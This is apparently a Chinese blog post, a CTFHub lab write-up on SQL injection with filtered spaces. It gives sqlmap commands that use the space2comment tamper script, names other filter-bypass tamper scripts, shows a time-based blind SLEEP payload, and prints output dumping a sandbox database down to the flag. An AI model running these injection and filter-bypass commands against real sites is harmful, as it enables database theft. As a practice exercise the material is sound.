Roxy-DD

你好！

欢迎来到我的博客

Learn More

标签

AI ctf GitHub Go Rust SQL Turborepo Unity UPX Vue 参考资料工具开发规范开源指南提示词

229 字

1 分钟

过滤空格

2024-11-24

web渗透

ctf

/

SQL

过滤空格#

第一步爆数据库

命令： python sqlmap.py -u “http://challenge-427e4b69b55064d9.sandbox.ctfhub.com:10080/?id=1” —dbs —tamper “space2comment.py”

补充：

脚本名： space2comment.py

作用：Replaces space character ’ ’ with comments //**

也就是用注释/**/替换空格字符’ ’

sqlmap 中的 tamper 脚本有很多，例如： equaltolike.py （作用是用like代替等号）、 apostrophemask.py （作用是用utf8代替引号）、 greatest.py （作用是绕过过滤’>’ ,用GREATEST替换大于号）等。

1
---
2
Parameter: id (GET)
3
    Type: time-based blind
4
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
5
    Payload: id=1 AND (SELECT 9677 FROM (SELECT(SLEEP(5)))ZfwJ)
6
tags: [web渗透]
7
title: 过滤空格
8
title: 过滤空格
9
title: 过滤空格
10
tags: [web渗透]
11
title: 过滤空格
12
tags: [web渗透]
13
---
14
available databases [4]:
15
[*] information_schema
16
[*] mysql
17
[*] performance_schema
18
[*] sqli
19
Database: sqli
20
[2 tables]
21
+------------+
22
| braoolkycm |
23
| news       |
24
+------------+
25
Database: sqli
26
Table: braoolkycm
27
[1 column]
28
+------------+--------------+
29
| Column     | Type         |
30
+------------+--------------+
31
| inybzfejkt | varchar(100) |
32
+------------+--------------+
33
sqlmap -u http://challenge-3de719b11fcb3158.sandbox.ctfhub.com:10800/?id=1 --tamper "space2comment.py" -D sqli -T braoolkycm -C inybzfejkt --dump --thread 10

—thread多线程

1
Database: sqli
2
Table: braoolkycm
3
[1 entry]
4
+----------------------------------+
5
| inybzfejkt                       |
6
+----------------------------------+
7
| ctfhub{0691522132f19a6c0aeff1d7} |
8
+----------------------------------+

过滤空格

https://mikufun.dpdns.org/posts/过滤空格/

作者

Roxy-DD

发布于

2024-11-24

许可协议

CC BY-NC-SA 4.0

部分信息可能已经过时

走进Golang

整数型SQL注入

assert(0)

过滤空格#